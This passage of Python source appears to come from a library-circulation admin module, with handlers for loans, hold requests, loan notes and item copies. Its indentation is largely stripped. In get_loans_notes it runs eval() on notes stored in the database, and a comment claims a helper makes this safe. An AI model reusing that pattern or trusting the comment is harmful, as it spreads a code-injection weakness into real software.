@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
    if request_id:
        db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED,
                                      request_id)
    result = db.get_all_requests()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_all_requests(result=result, ln=ln)
return page(title=_("List of hold requests"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def all_loans(req, msg=None, ln=CFG_SITE_LANG):
"""
    Display all current loans.
    @type msg: string.
    @param msg: when 'ok', an informational line confirming the newly
                registered loan is displayed.
    @return: list with all current loans.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if msg == 'ok':
infos.append(_('A new loan has been registered with success.'))
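    # 20 is presumably the number of loans shown per page by the template.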
result = db.get_all_loans(20)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_all_loans(result=result, infos=infos, ln=ln)
return page(title=_("Current loans"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def all_expired_loans(req, ln=CFG_SITE_LANG):
"""
    Display all expired (overdue) loans.
    @return: list with all expired loans (overdue loans).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = db.get_all_expired_loans()
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_all_expired_loans(result=result,
infos=infos,
ln=ln)
return page(title=_('Overdue loans'),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_pending_requests(req, request_id, print_data, ln=CFG_SITE_LANG):
"""
    Return all loan requests that are pending. If request_id is not None,
    cancel that request first and then return all pending loan requests.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type print_data: string.
@param print_data: print requests information.
@return: list of pending requests (on shelf with hold).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if print_data == 'true':
return print_pending_hold_requests_information(req, ln)
elif request_id:
# Cancel a request too.
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED,
request_id)
barcode = db.get_request_barcode(request_id)
update_requests_statuses(barcode)
result = db.get_loan_request_by_status(CFG_BIBCIRCULATION_REQUEST_STATUS_PENDING)
else:
result = db.get_loan_request_by_status(CFG_BIBCIRCULATION_REQUEST_STATUS_PENDING)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_pending_requests(result=result, ln=ln)
return page(title=_("Items on shelf with holds"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_waiting_requests(req, request_id, print_data, ln=CFG_SITE_LANG):
"""
Get all loans requests that are waiting.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type print_data: string.
@param print_data: print requests information.
@return: list of waiting requests (on loan with hold).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if print_data == 'true':
return print_pending_hold_requests_information(req, ln)
elif request_id:
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED,
request_id)
result = db.get_loan_request_by_status(CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING)
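    # Keep only the waiting requests whose record currently has at least one
    # copy on loan (request[1] is assumed to hold the record id).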
aux = ()
for request in result:
if db.get_nb_copies_on_loan(request[1]):
            aux += (request,)
result = aux
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_waiting_requests(result=result, ln=ln)
return page(title=_("Items on loan with holds"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_expired_loans_with_waiting_requests(req, request_id, ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
    if request_id:
        db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED,
                                      request_id)
    result = db.get_expired_loans_with_waiting_requests()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_get_expired_loans_with_waiting_requests(result=result,
ln=ln)
return page(title=_("Overdue loans with holds"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_loans_notes(req, loan_id, delete_key,
library_notes, back, ln=CFG_SITE_LANG):
"""
Get loan's note(s).
@type loan_id: integer.
    @param loan_id: identify a loan. It is the primary key of the table
crcLOAN.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
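    # Loan notes are persisted as a stringified dict keyed by timestamp, e.g.
    # "{'2013-05-02 10:15:00': 'Copy damaged on return.'}";
    # looks_like_dictionary() guards the eval() calls below against
    # malformed values.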
if delete_key and loan_id:
if looks_like_dictionary(db.get_loan_notes(loan_id)):
loans_notes = eval(db.get_loan_notes(loan_id))
if delete_key in loans_notes.keys():
del loans_notes[delete_key]
db.update_loan_notes(loan_id, loans_notes)
elif library_notes:
if db.get_loan_notes(loan_id):
if looks_like_dictionary(db.get_loan_notes(loan_id)):
loans_notes = eval(db.get_loan_notes(loan_id))
else:
loans_notes = {}
else:
loans_notes = {}
note_time = time.strftime("%Y-%m-%d %H:%M:%S")
if note_time not in loans_notes.keys():
loans_notes[note_time] = str(library_notes)
db.update_loan_notes(loan_id, loans_notes)
loans_notes = db.get_loan_notes(loan_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
referer = req.headers_in.get('referer')
body = bc_templates.tmpl_get_loans_notes(loans_notes=loans_notes,
loan_id=loan_id,
referer=referer, back=back,
ln=ln)
return page(title=_("Loan notes"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_loans_notes(req, loan_id, add_notes, new_note, ln=CFG_SITE_LANG):
"""
Get loan's notes.
    @param loan_id: identify a loan. It is the primary key of the table
                    crcLOAN.
    @param add_notes: display the textarea where a new note will be written.
    @param new_note: note that will be added to the other library notes.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if new_note:
date = '[' + time.ctime() + '] '
new_line = '\n'
new_note = date + new_note + new_line
db.add_new_loan_note(new_note, loan_id)
loans_notes = db.get_loan_notes(loan_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_loans_notes(loans_notes=loans_notes,
loan_id=loan_id,
add_notes=add_notes,
ln=ln)
return page(title=_("Loan notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### Items and their copies related templates
###
def get_item_details(req, recid, ln=CFG_SITE_LANG):
"""
Display the details of an item.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@return: item details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
    if recid is None:
infos.append(_("Record id not valid"))
copies = db.get_item_copies_details(recid)
requests = db.get_item_requests(recid)
loans = db.get_item_loans(recid)
purchases = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_NEW, recid)
req_hist_overview = db.get_item_requests_historical_overview(recid)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
purchases_hist_overview = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_details(recid=recid,
copies=copies,
requests=requests,
loans=loans,
purchases=purchases,
req_hist_overview=req_hist_overview,
loans_hist_overview=loans_hist_overview,
purchases_hist_overview=purchases_hist_overview,
infos=infos,
ln=ln)
return page(title=_("Item details"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_requests_details(req, recid, request_id, ln=CFG_SITE_LANG):
"""
Display all requests for a specific item.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@return: Item requests details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_id:
db.cancel_request(request_id)
update_request_data(request_id)
result = db.get_item_requests(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_requests_details(result=result,
ln=ln)
return page(title=_("Hold requests") + \
" - %s" % (book_title_from_MARC(recid)),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_loans_details(req, recid, barcode, loan_id, force,
ln=CFG_SITE_LANG):
"""
Show all the details about all current loans related with a record.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type loan_id: integer.
    @param loan_id: identify a loan. It is the primary key of the table
crcLOAN.
@type force: string.
@param force: force the renew of a loan, when usually this is not possible.
@return: item loans details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
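    # A renewal is refused when other users are queued for the same record,
    # unless the librarian confirms it via the force='true' link built below.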
if loan_id and barcode and force == 'true':
new_due_date = renew_loan_for_X_days(barcode)
#db.update_due_date(loan_id, new_due_date)
db.renew_loan(loan_id, new_due_date)
update_status_if_expired(loan_id)
infos.append(_("Loan renewed with success."))
elif barcode:
recid = db.get_id_bibrec(barcode)
item_description = db.get_item_description(barcode)
queue = db.get_queue_request(recid, item_description)
new_due_date = renew_loan_for_X_days(barcode)
force_renew_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_item_loans_details',
{'barcode': barcode, 'loan_id': loan_id, 'force': 'true',
'recid': recid, 'ln': ln}, (_("Yes")))
no_renew_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_item_loans_details',
{'recid': recid, 'ln': ln},
(_("No")))
if len(queue) != 0:
title = book_title_from_MARC(recid)
message = _("Another user is waiting for this book %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s.") % {'x_title': title, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
message += '\n\n'
message += _("Do you want renew this loan anyway?")
message += '\n\n'
message += "[%s] [%s]" % (force_renew_link, no_renew_link)
infos.append(message)
else:
db.renew_loan(loan_id, new_due_date)
#db.update_due_date(loan_id, new_due_date)
update_status_if_expired(loan_id)
infos.append(_("Loan renewed with success."))
result = db.get_item_loans(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_loans_details(result=result,
recid=recid,
infos=infos,
ln=ln)
return page(title=_("Loans details") + \
" - %s" % (book_title_from_MARC(int(recid))),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_req_historical_overview(req, recid, ln=CFG_SITE_LANG):
"""
Display the requests historical overview of an item.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@return: Item requests - historical overview.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
req_hist_overview = db.get_item_requests_historical_overview(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_req_historical_overview(
req_hist_overview=req_hist_overview,
ln=ln)
return page(title=_("Requests") + " - " + _("historical overview"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_loans_historical_overview(req, recid, ln=CFG_SITE_LANG):
"""
Display the loans historical overview of an item.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@return: Item loans - historical overview.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_loans_historical_overview(
loans_hist_overview=loans_hist_overview,
ln=ln)
return page(title=_("Loans") + " - " + _("historical overview"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step1(req, ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_add_new_copy_step1(ln)
return page(title=_("Add new copy") + " - I",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step2(req, p, f, ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_copy_step2(result=result, ln=ln)
return page(title=_("Add new copy") + " - II",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step3(req, recid, barcode, ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
result = db.get_item_copies_details(recid)
libraries = db.get_internal_libraries()
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
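    # If the caller passed the barcode of an existing copy, it is kept only as
    # a reference ('original_copy_barcode'); unknown barcodes are discarded.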
if barcode is not None:
if not db.barcode_in_use(barcode):
barcode = None
tmp_barcode = generate_tmp_barcode()
body = bc_templates.tmpl_add_new_copy_step3(recid=recid,
result=result,
libraries=libraries,
original_copy_barcode=barcode,
tmp_barcode=tmp_barcode,
infos=infos,
ln=ln)
return page(title=_("Add new copy") + " - III",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step4(req, barcode, library, location, collection, description,
loan_period, status, expected_arrival_date, recid,
ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
infos = []
result = db.get_item_copies_details(recid)
libraries = db.get_internal_libraries()
if db.barcode_in_use(barcode):
infos.append(_("The given barcode <strong>%(x_name)s</strong> is already in use.", x_name=barcode))
title = _("Add new copy") + " - III"
body = bc_templates.tmpl_add_new_copy_step3(recid=recid,
result=result,
libraries=libraries,
original_copy_barcode=None,
tmp_barcode=None,
infos=infos,
ln=ln)
elif not barcode:
infos.append(_("The given barcode is empty."))
title = _("Add new copy") + " - III"
body = bc_templates.tmpl_add_new_copy_step3(recid=recid,
result=result,
libraries=libraries,
original_copy_barcode=None,
tmp_barcode=None,
infos=infos,
ln=ln)
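    # Temporary barcodes are assumed to carry the 'tmp' prefix produced by
    # generate_tmp_barcode(); they are only acceptable while the copy still
    # has a pre-arrival status.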
elif barcode[:3] == 'tmp' \
and status in [CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF,
CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN,
CFG_BIBCIRCULATION_ITEM_STATUS_IN_PROCESS]:
infos.append(_("The status selected does not accept tamporary barcodes."))
title = _("Add new copy") + " - III"
tmp_barcode = generate_tmp_barcode()
body = bc_templates.tmpl_add_new_copy_step3(recid=recid,
result=result,
libraries=libraries,
original_copy_barcode=None,
tmp_barcode=tmp_barcode,
infos=infos,
ln=ln)
else:
library_name = db.get_library_name(library)
tup_infos = (barcode, library, library_name, location, collection,
description, loan_period, status, expected_arrival_date,
recid)
title = _("Add new copy") + " - IV"
body = bc_templates.tmpl_add_new_copy_step4(tup_infos=tup_infos, ln=ln)
return page(title=title,
uid=id_user,
req=req,
body=body,
metaheaderadd='<link rel="stylesheet" href="%s/vendors/jquery-ui/themes/themes/jquery-ui.min.css" '\
'type="text/css" />' % CFG_SITE_SECURE_URL,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step5(req, barcode, library, location, collection, description,
loan_period, status, expected_arrival_date, recid,
ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if not db.barcode_in_use(barcode):
db.add_new_copy(barcode, recid, library, collection, location, description.strip() or '-',
loan_period, status, expected_arrival_date)
update_requests_statuses(barcode)
else:
infos.append(_("The given barcode <strong>%(x_name)s</strong> is already in use.", x_name=barcode))
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_copy_step5(infos=infos, recid=recid, ln=ln)
return page(title=_("Add new copy") + " - V",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def delete_copy_step1(req, barcode, ln):
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
barcode = barcode.strip('\'" \t')
recid = db.get_id_bibrec(barcode)
if recid:
#recid = recid[0]
infos.append(_("Do you really want to delete this copy of the book?"))
copies = db.get_item_copies_details(recid)
title = _("Delete copy")
body = bc_templates.tmpl_delete_copy_step1(barcode_to_delete=barcode,
recid=recid,
result=copies,
infos=infos,
ln=ln)
else:
message = _("""The barcode <strong>%(x_name)s</strong> was not found""", x_name=(barcode))
infos.append(message)
title = _("Item search")
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
return page(title=title,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def delete_copy_step2(req, barcode, ln):
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
barcode = barcode.strip('\'" \t')
recid = db.get_id_bibrec(barcode)
if recid:
#recid = recid[0]
if db.delete_copy(barcode)==1:
message = _("The copy with barcode <strong>%(x_name)s</strong> has been deleted.", x_name=barcode)
else:
message = _('It was NOT possible to delete the copy with barcode <strong>%(x_name)s</strong>', x_name=barcode)
infos.append(message)
copies = db.get_item_copies_details(recid)
requests = db.get_item_requests(recid)
loans = db.get_item_loans(recid)
purchases = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_NEW, recid)
req_hist_overview = db.get_item_requests_historical_overview(recid)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
purchases_hist_overview = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, recid)
title = _("Item details")
body = bc_templates.tmpl_get_item_details(
recid=recid, copies=copies,
requests=requests, loans=loans,
purchases=purchases,
req_hist_overview=req_hist_overview,
loans_hist_overview=loans_hist_overview,
purchases_hist_overview=purchases_hist_overview,
infos=infos, ln=ln)
else:
message = _("The barcode <strong>%(x_name)s</strong> was not found", x_name=barcode)
infos.append(message)
title = _("Item search")
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=title,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step1(req, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_update_item_info_step1(ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step2(req, p, f, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
body = bc_templates.tmpl_update_item_info_step2(result=result, ln=ln)
return page(title="Update item information",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step3(req, recid, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = db.get_item_copies_details(recid)
body = bc_templates.tmpl_update_item_info_step3(recid=recid, result=result,
ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step4(req, barcode, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
recid = db.get_id_bibrec(barcode)
result = db.get_item_info(barcode)
libraries = db.get_internal_libraries()
libraries += db.get_hidden_libraries()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
    if recid is None:
_ = gettext_set_language(ln)
infos = []
infos.append(_("Barcode <strong>%(x_name)s</strong> not found", x_name=barcode))
return item_search(req, infos, ln)
body = bc_templates.tmpl_update_item_info_step4(recid=recid,
result=result,
libraries=libraries,
ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step5(req, barcode, old_barcode, library, location,
collection, description, loan_period, status,
expected_arrival_date, recid, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
library_name = db.get_library_name(library)
tup_infos = (barcode, old_barcode, library, library_name, location,
collection, description, loan_period, status,
expected_arrival_date, recid)
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_item_info_step5(tup_infos=tup_infos, ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step6(req, tup_infos, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
# tuple containing information for the update process.
(barcode, old_barcode, library_id, location, collection,
description, loan_period, status, expected_arrival_date, recid) = tup_infos
is_on_loan = db.is_on_loan(old_barcode)
#is_requested = db.is_requested(old_barcode)
# if item on loan and new status is CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF,
# item has to be returned.
if is_on_loan and status == CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF:
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF, old_barcode)
db.return_loan(old_barcode)
if not is_on_loan and status == CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN:
        # The new barcode may not be in the database yet, so read the current
        # status through the old one.
        status = db.get_copy_details(old_barcode)[7]
infos.append(_("Item <strong>[%(x_name)s]</strong> updated, but the <strong>status was not modified</strong>.",x_name=old_barcode))
# update item information.
db.update_item_info(old_barcode, library_id, collection, location, description.strip(),
loan_period, status, expected_arrival_date)
update_requests_statuses(old_barcode)
navtrail_previous_links = '<a class="navtrail"' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if barcode != old_barcode:
if db.barcode_in_use(barcode):
infos.append(_("Item <strong>[%(x_name)s]</strong> updated, but the <strong>barcode was not modified</strong> because it is already in use.", x_name=old_barcode))
else:
if db.update_barcode(old_barcode, barcode):
infos.append(_("Item <strong>[%(x_name)s]</strong> updated to <strong>[%(x_new)s]</strong> with success.",
x_name=old_barcode, x_new=barcode))
else:
infos.append(_("Item <strong>[%(x_name)s]</strong> updated, but the <strong>barcode was not modified</strong> because it was not found (!?).", x_name=old_barcode))
copies = db.get_item_copies_details(recid)
requests = db.get_item_requests(recid)
loans = db.get_item_loans(recid)
purchases = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_NEW, recid)
req_hist_overview = db.get_item_requests_historical_overview(recid)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
purchases_hist_overview = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, recid)
body = bc_templates.tmpl_get_item_details(recid=recid,
copies=copies,
requests=requests,
loans=loans,
purchases=purchases,
req_hist_overview=req_hist_overview,
loans_hist_overview=loans_hist_overview,
purchases_hist_overview=purchases_hist_overview,
infos=infos,
ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
else:
return redirect_to_url(req, CFG_SITE_SECURE_URL +
"/record/edit/#state=edit&recid=" + str(recid))
def item_search(req, infos=None, ln=CFG_SITE_LANG):
    """
    Display a form where it is possible to search for an item.
    """
    if infos is None:
        infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
_ = gettext_set_language(ln)
id_user = getUid(req)
